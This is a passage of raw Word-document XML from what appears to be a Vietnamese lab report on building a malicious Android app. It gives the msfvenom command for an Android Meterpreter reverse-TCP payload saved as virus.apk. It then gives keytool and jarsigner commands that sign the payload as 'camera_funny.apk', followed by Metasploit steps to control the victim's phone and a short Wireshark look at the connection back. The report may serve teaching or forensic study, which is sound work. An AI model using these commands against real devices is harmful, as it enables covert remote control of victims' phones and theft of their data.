          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc533387049"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.Tạo file APK sử dụng msfvenom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="20E7D40E" w14:textId="78BEEDB0" w:rsidR="0058535E" w:rsidRPr="002F05F7" w:rsidRDefault="00447E87" w:rsidP="00447E87">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F05F7">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="002F05F7">
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.27 LPORT=4444 R &gt; /root/Desktop/virus.apk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647EA2E6" w14:textId="77777777" w:rsidR="0058535E" w:rsidRDefault="0058535E" w:rsidP="0058535E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630B8875" w14:textId="4FB16BBA" w:rsidR="00447E87" w:rsidRDefault="0058535E" w:rsidP="0058535E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BE1A7DD" wp14:editId="20769494">
            <wp:extent cx="5705475" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="703" name="Picture 703" descr="https://lh6.googleusercontent.com/BLYTryDzmQliwJMKR8mpTin1K-P7uHX_uEoENzFByabp1evZAvx2Nd6ZUxxv-Y0goW8rVlPQ-47aC_CDaHV_SwxkBzKfIvXhXMXV4IDG87s5yPhiaBDikk67OJ49hgEDFTgajBBuS35ilwBj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LYTryDzmQliwJMKR8mpTin1K-P7uHX_uEoENzFByabp1evZAvx2Nd6ZUxxv-Y0goW8rVlPQ-47aC_CDaHV_SwxkBzKfIvXhXMXV4IDG87s5yPhiaBDikk67OJ49hgEDFTgajBBuS35ilwBjq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162050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F5157F" w14:textId="77777777" w:rsidR="00447E87" w:rsidRPr="00447E87" w:rsidRDefault="00447E87" w:rsidP="00447E87"/>
    <w:p w14:paraId="221D0257" w14:textId="6CC11EBE" w:rsidR="00BB1BAB" w:rsidRDefault="00BB1BAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc533387050"/>
      <w:r w:rsidRPr="00BB1BAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.Sử dụng key tool để tạo khóa cho file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="1DB9ED42" w14:textId="5018A67C" w:rsidR="00BB1BAB" w:rsidRPr="00BB1BAB" w:rsidRDefault="00BB1BAB" w:rsidP="00BB1BAB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB1BAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tiếp theo ta dùng keytool để tạo ra được các khóa private key và public key. Thông tin cần tạo trong keytool bao gồm tên, tổ chức, vị trí, quốc gia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CFCFB4" w14:textId="5B00FDE2" w:rsidR="00BB1BAB" w:rsidRPr="00BB1BAB" w:rsidRDefault="00BB1BAB" w:rsidP="00BB1BAB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB1BAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>keytool -genkey -v -keystore my-release-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB1BAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key.Keystore</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB1BAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -alias camera -keyalg RSA -keysize 2048 -validity 10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6C640" w14:textId="77777777" w:rsidR="00446F28" w:rsidRDefault="00446F28" w:rsidP="00446F28">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C53EDB" w14:textId="5A65C801" w:rsidR="00BB1BAB" w:rsidRDefault="00446F28" w:rsidP="00446F28">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4427BCEA" wp14:editId="1F72A2C1">
            <wp:extent cx="5715000" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="704" name="Picture 704" descr="https://lh6.googleusercontent.com/eaps2VXm8olzLHdUynpCraGNNcsoiW2d8oCr0B0HuOC1ulggkzmqV0MLUkwGuQtnHZo4fYCZLNk0hAEaVwCy2K4T2sIUUowIdG8lmePAJhMUs0Jwqdae985RMZ0plAfgTaJ5o5KKPlDN5Zj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eaps2VXm8olzLHdUynpCraGNNcsoiW2d8oCr0B0HuOC1ulggkzmqV0MLUkwGuQtnHZo4fYCZLNk0hAEaVwCy2K4T2sIUUowIdG8lmePAJhMUs0Jwqdae985RMZ0plAfgTaJ5o5KKPlDN5ZjL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14:paraId="4744AB8B" w14:textId="3075CC5D" w:rsidR="00446F28" w:rsidRDefault="00446F28" w:rsidP="00BB1BAB"/>
    <w:p w14:paraId="6BE75BA4" w14:textId="55B1560F" w:rsidR="00446F28" w:rsidRDefault="00446F28" w:rsidP="00BB1BAB"/>
    <w:p w14:paraId="4D21562C" w14:textId="29AFE332" w:rsidR="002351BD" w:rsidRPr="00BB1BAB" w:rsidRDefault="002351BD" w:rsidP="00BB1BAB"/>
    <w:p w14:paraId="08B3B95D" w14:textId="00C9FF25" w:rsidR="002351BD" w:rsidRDefault="002351BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc533387051"/>
      <w:r w:rsidRPr="002351BD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.Tạo key store để sử dụng jarsigner</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="604DD8C6" w14:textId="258215D3" w:rsidR="002351BD" w:rsidRDefault="002351BD" w:rsidP="002351BD"/>
    <w:p w14:paraId="0A8C0231" w14:textId="4C179BE8" w:rsidR="002351BD" w:rsidRPr="002F05F7" w:rsidRDefault="002351BD" w:rsidP="002351BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F05F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="002F05F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F05F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key.Keystore</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F05F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> camera_funny.apk camera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C4E33B" w14:textId="216AB2E7" w:rsidR="004E2400" w:rsidRDefault="004E2400" w:rsidP="004E2400">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F63638A" wp14:editId="2E62DAA5">
            <wp:extent cx="5676900" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="705" name="Picture 705" descr="https://lh4.googleusercontent.com/P_F07fx89wAQPITXvAMs3NHP3DWSBoiUtSsFgIy8YaV6X47xQN0l7gJpYPBwjQ4evZKYywxf3MNN5fuW4XBBOSDRIWJ8MkbArAmHS_qs6VvyeNUVVRmdcNzrnjI_indvs5xGP0XOJdXy_DEx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P_F07fx89wAQPITXvAMs3NHP3DWSBoiUtSsFgIy8YaV6X47xQN0l7gJpYPBwjQ4evZKYywxf3MNN5fuW4XBBOSDRIWJ8MkbArAmHS_qs6VvyeNUVVRmdcNzrnjI_indvs5xGP0XOJdXy_DEx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1762125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28787584" w14:textId="77777777" w:rsidR="002351BD" w:rsidRPr="002351BD" w:rsidRDefault="002351BD" w:rsidP="002351BD"/>
    <w:p w14:paraId="155DFBEC" w14:textId="48C357F7" w:rsidR="004E2400" w:rsidRDefault="004E2400">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc533387052"/>
      <w:r w:rsidRPr="004E2400">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Ký gói apk bằng jarsigner.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="09127CC5" w14:textId="77777777" w:rsidR="004E2400" w:rsidRPr="004E2400" w:rsidRDefault="004E2400" w:rsidP="004E2400"/>
    <w:p w14:paraId="4C9FFCA3" w14:textId="3C5CCB64" w:rsidR="004E2400" w:rsidRDefault="004E2400" w:rsidP="004E2400">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F930C60" wp14:editId="25C15974">
            <wp:extent cx="5629275" cy="4286250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="706" name="Picture 706" descr="https://lh6.googleusercontent.com/Zja_kaiGiWIczsBvYrov3-t4XDqMjlUlq6oTy0e_yaoJkPTVxhBt0zqhtXv0lTbwgtnlpJU-N9hQXpcWVXOeFXZfkLG1MHoy7FlLQzWdX0M1CExV2_C75bCoeDml4bVMTbfsHApCZsF10PS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Zja_kaiGiWIczsBvYrov3-t4XDqMjlUlq6oTy0e_yaoJkPTVxhBt0zqhtXv0lTbwgtnlpJU-N9hQXpcWVXOeFXZfkLG1MHoy7FlLQzWdX0M1CExV2_C75bCoeDml4bVMTbfsHApCZsF10PSzc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4286250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9D1A49" w14:textId="77777777" w:rsidR="004E2400" w:rsidRPr="004E2400" w:rsidRDefault="004E2400" w:rsidP="004E2400"/>
    <w:p w14:paraId="73002522" w14:textId="2CDFB5DF" w:rsidR="004E2400" w:rsidRDefault="004E2400">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc533387053"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="004E2400">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Tiến hành cài </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>và sử dụng Metasploit để điều khiển máy nạn nhân</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="1D50ECE7" w14:textId="449D18EF" w:rsidR="004E2400" w:rsidRDefault="004E2400" w:rsidP="004E2400"/>
    <w:p w14:paraId="71943425" w14:textId="1F1AF3AD" w:rsidR="002F05F7" w:rsidRDefault="004E2400" w:rsidP="002F05F7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DDE5E18" wp14:editId="5B75538D">
            <wp:extent cx="5943600" cy="1438275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="707" name="Picture 707" descr="https://lh3.googleusercontent.com/Hk-8KH9DO7HmAH4937ZTvnK3HFA8J7MOnipdFYSZcYZTB4WehlXhNB8QE94Cy0sIDSbL3U8a7ZyQQIqvkMBRotG5TMFYHKxsgmE3mSCjz19ifiDmz_cpATPoUlYOWDJl4lkbMu7y69xg0kH8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Hk-8KH9DO7HmAH4937ZTvnK3HFA8J7MOnipdFYSZcYZTB4WehlXhNB8QE94Cy0sIDSbL3U8a7ZyQQIqvkMBRotG5TMFYHKxsgmE3mSCjz19ifiDmz_cpATPoUlYOWDJl4lkbMu7y69xg0kH8s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6802EB98" w14:textId="77777777" w:rsidR="002F05F7" w:rsidRPr="004E2400" w:rsidRDefault="002F05F7" w:rsidP="002F05F7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1C6E4E" w14:textId="1F7B234E" w:rsidR="004E2400" w:rsidRPr="004E2400" w:rsidRDefault="004E2400">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc533387054"/>
      <w:r w:rsidRPr="004E2400">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6. Kết quả.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="52063410" w14:textId="1C453D83" w:rsidR="004E2400" w:rsidRDefault="004E2400" w:rsidP="004E2400"/>
    <w:p w14:paraId="27558CFA" w14:textId="3D9764DC" w:rsidR="00E131C2" w:rsidRDefault="00E131C2" w:rsidP="00332F18">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7405309F" wp14:editId="062748C3">
            <wp:extent cx="5943600" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="708" name="Picture 708" descr="https://lh6.googleusercontent.com/sG9L-CraZRVjmO7GHn8kQjSphkYX356Mjkmp4HkkslUD1Q2YttXOxE9rqtEtK3JP55IDq70MyRBsCQUvYQt943MsuMLLAZ-_FMrn7lLEIVT5vkbbaveZ4-F627g2GvY0d2D5_q0J0e5EBxlL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sG9L-CraZRVjmO7GHn8kQjSphkYX356Mjkmp4HkkslUD1Q2YttXOxE9rqtEtK3JP55IDq70MyRBsCQUvYQt943MsuMLLAZ-_FMrn7lLEIVT5vkbbaveZ4-F627g2GvY0d2D5_q0J0e5EBxlL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2726576" w14:textId="2C1F2434" w:rsidR="00E131C2" w:rsidRDefault="00E131C2" w:rsidP="004E2400"/>
    <w:p w14:paraId="58A0C72F" w14:textId="0B75827F" w:rsidR="00302234" w:rsidRDefault="00302234" w:rsidP="00E856C2"/>
    <w:p w14:paraId="361BF683" w14:textId="3096721A" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="00E856C2"/>
    <w:p w14:paraId="16A4174E" w14:textId="6342E15C" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="00E856C2"/>
    <w:p w14:paraId="17CC79BD" w14:textId="54F2F9D9" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="00E856C2"/>
    <w:p w14:paraId="0867E3DC" w14:textId="6CBA69C1" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="00E856C2"/>
    <w:p w14:paraId="467809D3" w14:textId="3A46EFCC" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="00E856C2"/>
    <w:p w14:paraId="4E6A3821" w14:textId="7996CBE4" w:rsidR="002F05F7" w:rsidRDefault="002F05F7" w:rsidP="00E856C2"/>
    <w:p w14:paraId="2918E982" w14:textId="77777777" w:rsidR="002F05F7" w:rsidRPr="004E2400" w:rsidRDefault="002F05F7" w:rsidP="00E856C2"/>
    <w:p w14:paraId="2DCDBE5A" w14:textId="2CFAB37E" w:rsidR="00392A5B" w:rsidRPr="00447E87" w:rsidRDefault="00392A5B" w:rsidP="00392A5B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc533387055"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Chương 4. Điều tra file vừa tạo.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="28C4B367" w14:textId="1D234CF6" w:rsidR="00392A5B" w:rsidRPr="00447E87" w:rsidRDefault="00392A5B" w:rsidP="00392A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E4C4B56" w14:textId="3D542DE5" w:rsidR="00392A5B" w:rsidRPr="00866051" w:rsidRDefault="00E856C2" w:rsidP="00392A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00866051">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">-Sau khi nạn nhận kích hoạt file apk đã </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00866051">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cài ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00866051">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> điện thoại nạn nhân sẽ tự động kết nối ngược về máy hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617189B9" w14:textId="1DFFC4E4" w:rsidR="00E856C2" w:rsidRDefault="00E856C2" w:rsidP="00392A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00866051">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Sử dụng tool “Wireshark” tiến hành phân tích kết nối giữa máy nạn nhân qua giao thức TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78312B54" w14:textId="77777777" w:rsidR="004A43DE" w:rsidRPr="00866051" w:rsidRDefault="004A43DE" w:rsidP="00392A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34DCA80F" w14:textId="4AF0DF31" w:rsidR="00B4601B" w:rsidRPr="00447E87" w:rsidRDefault="002D37D6" w:rsidP="004A43DE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51AAAF60" wp14:editId="6A4CF986">
